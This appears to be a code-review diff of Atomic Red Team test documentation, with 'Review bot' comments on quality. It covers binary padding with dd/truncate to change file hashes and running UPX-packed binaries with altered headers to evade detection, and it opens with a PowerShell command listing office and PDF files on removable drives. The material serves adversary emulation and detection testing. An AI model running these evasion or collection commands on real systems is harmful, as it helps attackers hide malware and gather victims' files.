powershell.exe -c "Get-Volume | Where-Object {$_.DriveType -eq 'Removable'} | ForEach-Object { Get-ChildItem -Path ($_.DriveLetter + ':\*') -Recurse -Include '*.doc*','*.xls*','*.txt','*.pdf' -ErrorAction SilentlyContinue | ForEach-Object {Write-Output $_.FullName} } ; if (-not (Get-Volume | Where-Object {$_.DriveType -eq 'Removable'})) { Write-Output 'No removable media.' }"
```
<br/>
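Review bot: the attack command builds the search path as `($_.DriveLetter + ':\*')`, so a removable volume with no drive letter assigned (`DriveLetter` is null) produces the path `:\*`, and `-ErrorAction SilentlyContinue` then hides the error while the test silently reports nothing for that device; adding `-and $_.DriveLetter` to the `Where-Object` filter, and evaluating `Get-Volume` once into a variable instead of twice, would make the result reliable. `Get-Volume` also comes from the Storage module (Windows 8 / Server 2012 and later), which is worth stating in the description or checking as a dependency.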
+49 -33
@@ -1,35 +1,44 @@
# T1027.001 - Obfuscated Files or Information: Binary Padding
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/001)
<blockquote>
## Description from ATT&CK
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
> Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
>
> Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
[Source](https://attack.mitre.org/techniques/T1027/001)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1-pad-binary-to-change-hash---linuxmacos-dd)
- [Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS](#atomic-test-2-pad-binary-to-change-hash-using-truncate-command---linuxmacos)
- [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
### Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd
- [Atomic Test #2 - Pad Binary to Change Hash using truncate command - Linux/macOS](#atomic-test-2---pad-binary-to-change-hash-using-truncate-command---linuxmacos)
<br/>
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** `ffe2346c-abd5-4b45-a713-bf5f1ebd573a`
#### Inputs
**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | path | /tmp/evil-binary|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
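Review bot: the `dd` comments (`#adds null bytes`, high-quality and low-quality random data) overstate what happens: each line appends exactly one byte (`bs=1 count=1`), and on current Linux (5.6 and later) and on macOS `/dev/random` and `/dev/urandom` are served by the same CSPRNG, so the quality distinction is historical; comments such as `# appends one zero byte` and `# appends one random byte` describe the test accurately. `#{file_to_pad}` is also unquoted in the redirections and in the prereq checks, so a path containing spaces breaks the test; quoting it as `"#{file_to_pad}"` is cheap.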
@@ -37,69 +46,76 @@ dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm #{file_to_pad}
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: The binary must exist on disk at specified location (#{file_to_pad})
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
cp /bin/ls #{file_to_pad}
```
### Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS
<br/>
<br/>
## Atomic Test #2 - Pad Binary to Change Hash using truncate command - Linux/macOS
Uses truncate to add a byte to the binary to change the hash.
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** `e22a9e89-69c7-410f-a473-e6c212cd2292`
#### Inputs
**auto_generated_guid:** e22a9e89-69c7-410f-a473-e6c212cd2292
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | path | /tmp/evil-binary|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
truncate -s +1 #{file_to_pad} #adds a byte to the file size
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm #{file_to_pad}
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: The binary must exist on disk at specified location (#{file_to_pad})
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
cp /bin/ls #{file_to_pad}
```
<br/>
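Review bot: both cleanups run `rm #{file_to_pad}` unconditionally, which is only safe when the file was created by the Get Prereq step (`cp /bin/ls #{file_to_pad}`); a user who points `file_to_pad` at a binary of their own loses it at cleanup, so either restrict the cleanup to the default path or state in the input description that the file is deleted. Test #2 also lists macOS as supported, but `truncate` is not part of the macOS base system (it ships with GNU coreutils), and the dependency section only checks that the file exists; a `command -v truncate` prereq check (or a `dd`-based fallback) is needed there.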
+85 -33
@@ -1,48 +1,65 @@
# T1027.002 - Obfuscated Files or Information: Software Packing
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/002)
<blockquote>
## Description from ATT&CK
Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)
> Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)
>
> Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)
[Source](https://attack.mitre.org/techniques/T1027/002)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Binary simply packed by UPX (linux)](#atomic-test-1-binary-simply-packed-by-upx-linux)
- [Atomic Test #2: Binary packed by UPX, with modified headers (linux)](#atomic-test-2-binary-packed-by-upx-with-modified-headers-linux)
- [Atomic Test #3: Binary simply packed by UPX](#atomic-test-3-binary-simply-packed-by-upx)
- [Atomic Test #4: Binary packed by UPX, with modified headers](#atomic-test-4-binary-packed-by-upx-with-modified-headers)
- [Atomic Test #1 - Binary simply packed by UPX (linux)](#atomic-test-1---binary-simply-packed-by-upx-linux)
### Atomic Test #1: Binary simply packed by UPX (linux)
- [Atomic Test #2 - Binary packed by UPX, with modified headers (linux)](#atomic-test-2---binary-packed-by-upx-with-modified-headers-linux)
- [Atomic Test #3 - Binary simply packed by UPX](#atomic-test-3---binary-simply-packed-by-upx)
- [Atomic Test #4 - Binary packed by UPX, with modified headers](#atomic-test-4---binary-packed-by-upx-with-modified-headers)
<br/>
## Atomic Test #1 - Binary simply packed by UPX (linux)
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
**Supported Platforms:** Linux
**auto_generated_guid:** `11c46cd8-e471-450e-acb8-52a1216ae6a4`
#### Inputs
**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm /tmp/packed_bin
```
### Atomic Test #2: Binary packed by UPX, with modified headers (linux)
<br/>
<br/>
## Atomic Test #2 - Binary packed by UPX, with modified headers (linux)
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
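Review bot: unlike the T1027.001 tests, these tests have no Dependencies section checking that `#{bin_path}` exists and is executable, so `cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin` fails with an unhelpful error when the atomics folder is incomplete or the packed binary has lost its execute bit; a `[ -x "#{bin_path}" ]` prereq check would make that explicit. Naming: Tests #1/#2 carry a `(linux)` suffix while the macOS Tests #3/#4 carry none, which makes the four TOC entries hard to tell apart; a matching `(macOS)` suffix would help, and "No other protection/compression were applied" should read "was applied".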
@@ -50,53 +67,77 @@ by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** Linux
**auto_generated_guid:** `f06197f8-ff46-48c2-a0c6-afc1b50665e1`
#### Inputs
**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm /tmp/packed_bin
```
### Atomic Test #3: Binary simply packed by UPX
<br/>
<br/>
## Atomic Test #3 - Binary simply packed by UPX
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
**Supported Platforms:** macOS
**auto_generated_guid:** `b16ef901-00bb-4dda-b4fc-a04db5067e20`
#### Inputs
**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm /tmp/packed_bin
```
### Atomic Test #4: Binary packed by UPX, with modified headers
<br/>
<br/>
## Atomic Test #4 - Binary packed by UPX, with modified headers
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
@@ -104,22 +145,33 @@ by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** macOS
**auto_generated_guid:** `4d46e16b-5765-4046-9f25-a600d3e65e4d`
#### Inputs
**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm /tmp/packed_bin
```
<br/>
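Review bot: the cleanup `rm /tmp/packed_bin` (identical in all four tests) errors when the attack step failed before the copy, and all four tests share the same fixed path in `/tmp`; `rm -f /tmp/packed_bin` makes the cleanup idempotent, and a per-test file name (for example including the guid) would keep the tests from overwriting each other's artifacts when run back to back.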

Some files were not shown because too many files have changed in this diff.